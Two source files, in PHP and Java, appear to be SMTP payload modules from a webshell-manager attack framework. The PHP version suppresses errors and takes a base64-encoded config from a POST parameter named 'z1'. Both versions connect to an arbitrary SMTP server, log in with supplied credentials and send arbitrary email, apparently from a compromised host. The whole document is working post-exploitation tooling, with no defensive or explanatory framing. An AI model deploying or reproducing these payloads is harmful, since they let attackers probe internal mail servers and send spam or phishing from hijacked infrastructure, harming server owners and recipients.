File: Plugins/Manager/SMTP/payloads/PHP/v7.X/OneShell/payload.php
<?php

@error_reporting(0);
header('Content-Type: text/plain; charset=utf-8');

function getJsonValue($json, $key) {
    if (empty($json)) return "";
    if (preg_match('/"' . $key . '"\s*:\s*"(.*?)"/', $json, $matches)) {
        return $matches[1];
    }
    if (preg_match('/"' . $key . '"\s*:\s*([^,\}\\]]+)/', $json, $matches)) {
        return trim(str_replace('"', '', $matches[1]));
    }
    return "";
}

function extractValue($json, $key) {
    if (empty($json)) return "";
    if (preg_match('/"' . $key . '"\s*:\s*"(.*?)"/', $json, $matches)) {
        return $matches[1];
    }
    return "";
}

function readMultilineResponse($socket) {
    $response = "";
    while (($line = fgets($socket, 515)) !== false) {
        $response .= $line;
        if (isset($line[3]) && $line[3] === ' ') {
            break;
        }
    }
    return $response;
}

function processSmtpAction($host, $port, $ssl, $user, $pass, $timeout, $action, $extraData) {
    if (empty($action)) {
        $action = "test";
    }
    $action = strtolower($action);

    $protocol = $ssl ? "ssl://" : "";
    $remoteSocket = "{$protocol}{$host}:{$port}";

    $errno = 0;
    $errstr = "";
    $socket = @fsockopen($remoteSocket, $port, $errno, $errstr, (float)$timeout);

    if (!$socket) {
        return "[-] SMTP Error: Failed to connect to {$host}:{$port} -> {$errstr}";
    }

    stream_set_timeout($socket, $timeout);

    try {
        if ($action === "test") {
            $greeting = fgets($socket, 515);
            fclose($socket);
            if ($greeting === false) $greeting = "";
            return "[+] SUCCESS_SMTP_CONNECTED\nServer Greeting: " . trim($greeting);
        } 
        else if ($action === "send") {
            $from = extractValue($extraData, "from");
            $to = extractValue($extraData, "to");
            $subject = extractValue($extraData, "subject");
            $body = extractValue($extraData, "body");

            if (empty($from)) {
                $from = "admin@local.test";
            }
            if (empty($to)) {
                fclose($socket);
                return "[-] Failed to send: Recipient (to) is empty.";
            }

            // Read banner
            $resp = fgets($socket, 515);
            if ($resp === false || strpos($resp, "220") !== 0) {
                fclose($socket);
                return "[-] SMTP Error: Invalid greeting -> " . trim($resp);
            }

            // EHLO
            fwrite($socket, "EHLO localhost\r\n");
            readMultilineResponse($socket);

            // AUTH
            if (!empty($user) && $pass !== null) {
                fwrite($socket, "AUTH LOGIN\r\n");
                $resp = fgets($socket, 515);
                if (strpos($resp, "334") !== 0) {
                    fclose($socket);
                    return "[-] SMTP Error: AUTH LOGIN failed -> " . trim($resp);
                }

                fwrite($socket, base64_encode($user) . "\r\n");
                $resp = fgets($socket, 515);
                if (strpos($resp, "334") !== 0) {
                    fclose($socket);
                    return "[-] SMTP Error: Username rejected -> " . trim($resp);
                }

                fwrite($socket, base64_encode($pass) . "\r\n");
                $resp = fgets($socket, 515);
                if (strpos($resp, "235") !== 0) {
                    fclose($socket);
                    return "[-] SMTP Error: Authentication failed -> " . trim($resp);
                }
            }

            // MAIL FROM
            fwrite($socket, "MAIL FROM:<{$from}>\r\n");
            $resp = fgets($socket, 515);
            if (strpos($resp, "250") !== 0) {
                fclose($socket);
                return "[-] SMTP Error: MAIL FROM failed -> " . trim($resp);
            }

            // RCPT TO
            fwrite($socket, "RCPT TO:<{$to}>\r\n");
            $resp = fgets($socket, 515);
            if (strpos($resp, "250") !== 0 && strpos($resp, "251") !== 0) {
                fclose($socket);
                return "[-] SMTP Error: RCPT TO failed -> " . trim($resp);
            }

            // DATA
            fwrite($socket, "DATA\r\n");
            $resp = fgets($socket, 515);
            if (strpos($resp, "354") !== 0) {
                fclose($socket);
                return "[-] SMTP Error: DATA command failed -> " . trim($resp);
            }

            // EMail content
            $emailContent  = "From: {$from}\r\n";
            $emailContent .= "To: {$to}\r\n";
            $emailContent .= "Subject: " . ($subject ?? "") . "\r\n";
            $emailContent .= "Content-Type: text/plain; charset=UTF-8\r\n";
            $emailContent .= "\r\n";
            $emailContent .= ($body ?? "") . "\r\n";
            $emailContent .= ".\r\n";

            fwrite($socket, $emailContent);
            $resp = fgets($socket, 515);
            if (strpos($resp, "250") !== 0) {
                fclose($socket);
                return "[-] SMTP Error: Message data rejected -> " . trim($resp);
            }

            // QUIT
            fwrite($socket, "QUIT\r\n");
            fclose($socket);

            return "[+] SUCCESS_MAIL_SENT -> Successfully sent test email to {$to} via {$host}:{$port}";
        } 
        else {
            fclose($socket);
            return "[-] ERROR: Unknown SMTP action.";
        }
    } catch (Exception $ex) {
        if (is_resource($socket)) {
            fclose($socket);
        }
        return "[-] SMTP Error: " . $ex->getMessage();
    }
}

function main() {
    $z1 = $_POST['z1'] ?? '';
    if (empty($z1)) {
        echo "[-] Missing parameter z1";
        return;
    }

    $decoded = base64_decode($z1, true);
    $config_raw = ($decoded !== false && $decoded !== '') ? $decoded : $z1;
    
    $host = getJsonValue($config_raw, "ip");
    if (empty($host)) {
        $host = "127.0.0.1";
    }

    $port = 25;
    $portStr = getJsonValue($config_raw, "port");
    if (!empty($portStr)) {
        $port = (int)$portStr;
    }
    if ($port <= 0) $port = 25;

    $sslStr = getJsonValue($config_raw, "ssl");
    $ssl = filter_var($sslStr, FILTER_VALIDATE_BOOLEAN);

    $user = getJsonValue($config_raw, "user");
    $pass = getJsonValue($config_raw, "pass");
    $action = getJsonValue($config_raw, "action");
    $extraData = getJsonValue($config_raw, "data");

    $timeout = 15;
    $timeoutStr = getJsonValue($config_raw, "timeout");
    if (!empty($timeoutStr)) {
        $timeout = (int)$timeoutStr;
    }
    if ($timeout <= 0) $timeout = 15;

    echo processSmtpAction($host, $port, $ssl, $user, $pass, $timeout, $action, $extraData);
}

main();

?>

File: Manager/SMTP/payloads/CFM/NebulaPulsar(Java 8)/DarkMatter/payload.java
import java.io.*;
import java.net.*;
import java.util.*;
import java.util.regex.*;
import javax.net.ssl.*;
import java.nio.charset.StandardCharsets;

public class payload {

    public payload() {}

    public String execute(Object param) {
        try {
            if (!(param instanceof Map)) {
                return "[-] ERROR: Invalid parameter type. Expected Map.";
            }
            
            @SuppressWarnings("unchecked")
            Map<String, Object> mapParam = (Map<String, Object>) param;
            
            Object jsonValue = mapParam.get("json");
            if (jsonValue == null || jsonValue.toString().isEmpty()) {
                return "[-] Missing parameter json";
            }

            String szJson = jsonValue.toString();

            String host = getJsonValue(szJson, "ip");
            if (host == null || host.isEmpty()) {
                host = "127.0.0.1";
            }

            int port = 25;
            try {
                String portStr = getJsonValue(szJson, "port");
                if (portStr != null && !portStr.isEmpty()) {
                    port = Integer.parseInt(portStr);
                }
            } catch (NumberFormatException ignored) {}
            if (port <= 0) port = 25;

            boolean ssl = false;
            try {
                String sslStr = getJsonValue(szJson, "ssl");
                if (sslStr != null && !sslStr.isEmpty()) {
                    ssl = Boolean.parseBoolean(sslStr);
                }
            } catch (Exception ignored) {}

            String user = getJsonValue(szJson, "user");
            String pass = getJsonValue(szJson, "pass");
            String action = getJsonValue(szJson, "action");
            String extraData = getJsonValue(szJson, "data");

            int timeout = 15;
            try {
                String timeoutStr = getJsonValue(szJson, "timeout");
                if (timeoutStr != null && !timeoutStr.isEmpty()) {
                    timeout = Integer.parseInt(timeoutStr);
                }
            } catch (NumberFormatException ignored) {}
            if (timeout <= 0) timeout = 15;

            return processSmtpAction(host, port, ssl, user, pass, timeout, action, extraData);
        } catch (Exception e) {
            return "[-] ERROR: " + e.getMessage();
        }
    }

    private String getJsonValue(String json, String key) {
        Pattern pattern = Pattern.compile("\"" + key + "\"\\s*:\\s*\"(.*?)\"");
        Matcher matcher = pattern.matcher(json);
        if (matcher.find()) {
            return matcher.group(1);
        }

        pattern = Pattern.compile("\"" + key + "\"\\s*:\\s*([^,\\}\\]]+)");
        matcher = pattern.matcher(json);
        if (matcher.find()) {
            return matcher.group(1).trim().replace("\"", "");
        }

        return "";
    }

    private String processSmtpAction(String host, int port, boolean ssl, String user, String pass, int timeout, String action, String extraData) {
        if (action == null || action.isEmpty()) {
            action = "test";
        }
        action = action.toLowerCase();

        try {
            if (action.equals("test")) {
                Socket socket = createSocket(host, port, ssl, timeout);
                try {
                    socket.setSoTimeout(timeout * 1000);
                    BufferedReader reader = new BufferedReader(new InputStreamReader(socket.getInputStream(), StandardCharsets.US_ASCII));
                    String greeting = reader.readLine();
                    if (greeting == null) greeting = "";
                    return "[+] SUCCESS_SMTP_CONNECTED\nServer Greeting: " + greeting.trim();
                } finally {
                    socket.close();
                }
            } else if (action.equals("send")) {
                String from = extractValue(extraData, "from");
                String to = extractValue(extraData, "to");
                String subject = extractValue(extraData, "subject");
                String body = extractValue(extraData, "body");

                if (from == null || from.isEmpty()) {
                    from = "admin@local.test";
                }
                if (to == null || to.isEmpty()) {
                    return "[-] Failed to send: Recipient (to) is empty.";
                }

                Socket socket = createSocket(host, port, ssl, timeout);
                try {
                    socket.setSoTimeout(timeout * 1000);
                    BufferedReader reader = new BufferedReader(new InputStreamReader(socket.getInputStream(), StandardCharsets.US_ASCII));
                    BufferedWriter writer = new BufferedWriter(new OutputStreamWriter(socket.getOutputStream(), StandardCharsets.US_ASCII));

                    // Read greeting
                    String resp = reader.readLine();
                    if (resp == null || !resp.startsWith("220")) {
                        return "[-] SMTP Error: Invalid greeting -> " + resp;
                    }

                    // EHLO
                    writer.write("EHLO localhost\r\n");
                    writer.flush();
                    readMultilineResponse(reader);

                    // Auth if credentials provided
                    if (user != null && !user.isEmpty() && pass != null) {
                        writer.write("AUTH LOGIN\r\n");
                        writer.flush();
                        resp = reader.readLine();
                        if (resp == null || !resp.startsWith("334")) {
                            return "[-] SMTP Error: AUTH LOGIN failed -> " + resp;
                        }

                        writer.write(Base64.getEncoder().encodeToString(user.getBytes(StandardCharsets.UTF_8)) + "\r\n");
                        writer.flush();
                        resp = reader.readLine();
                        if (resp == null || !resp.startsWith("334")) {
                            return "[-] SMTP Error: Username rejected -> " + resp;
                        }

                        writer.write(Base64.getEncoder().encodeToString(pass.getBytes(StandardCharsets.UTF_8)) + "\r\n");
                        writer.flush();
                        resp = reader.readLine();
                        if (resp == null || !resp.startsWith("235")) {
                            return "[-] SMTP Error: Authentication failed -> " + resp;
                        }
                    }

                    // MAIL FROM
                    writer.write("MAIL FROM:<" + from + ">\r\n");
                    writer.flush();
                    resp = reader.readLine();
                    if (resp == null || !resp.startsWith("250")) {
                        return "[-] SMTP Error: MAIL FROM failed -> " + resp;
                    }

                    // RCPT TO
                    writer.write("RCPT TO:<" + to + ">\r\n");
                    writer.flush();
                    resp = reader.readLine();
                    if (resp == null || (!resp.startsWith("250") && !resp.startsWith("251"))) {
                        return "[-] SMTP Error: RCPT TO failed -> " + resp;
                    }

                    // DATA
                    writer.write("DATA\r\n");
                    writer.flush();
                    resp = reader.readLine();
                    if (resp == null || !resp.startsWith("354")) {
                        return "[-] SMTP Error: DATA command failed -> " + resp;
                    }

                    // Send Email Content
                    writer.write("From: " + from + "\r\n");
                    writer.write("To: " + to + "\r\n");
                    writer.write("Subject: " + (subject != null ? subject : "") + "\r\n");
                    writer.write("Content-Type: text/plain; charset=UTF-8\r\n");
                    writer.write("\r\n");
                    writer.write((body != null ? body : "") + "\r\n");
                    writer.write(".\r\n");
                    writer.flush();

                    resp = reader.readLine();
                    if (resp == null || !resp.startsWith("250")) {
                        return "[-] SMTP Error: Message data rejected -> " + resp;
                    }

                    // QUIT
                    writer.write("QUIT\r\n");
                    writer.flush();

                    return "[+] SUCCESS_MAIL_SENT -> Successfully sent test email to " + to + " via " + host + ":" + port;
                } finally {
                    socket.close();
                }
            } else {
                return "[-] ERROR: Unknown SMTP action.";
            }
        } catch (Exception ex) {
            return "[-] SMTP Error: " + ex.getMessage();
        }
    }

    private Socket createSocket(String host, int port, boolean ssl, int timeout) throws Exception {
        if (ssl) {
            SSLSocketFactory factory = (SSLSocketFactory) SSLSocketFactory.getDefault();
            SSLSocket socket = (SSLSocket) factory.createSocket();
            socket.connect(new InetSocketAddress(host, port), timeout * 1000);
            return socket;
        } else {
            Socket socket = new Socket();
            socket.connect(new InetSocketAddress(host, port), timeout * 1000);
            return socket;
        }
    }

    private void readMultilineResponse(BufferedReader reader) throws IOException {
        String line;
        while ((line = reader.readLine()) != null) {
            if (line.length() >= 4 && line.charAt(3) == ' ') {
                break;
            }
        }
    }

    private String extractValue(String json, String key) {
        if (json == null || json.isEmpty()) return "";
        Pattern pattern = Pattern.compile("\"" + key + "\"\\s*:\\s*\"(.*?)\"");
        Matcher matcher = pattern.matcher(json);
        if (matcher.find()) {
            return matcher.group(1);
        }
        return "";
    }
}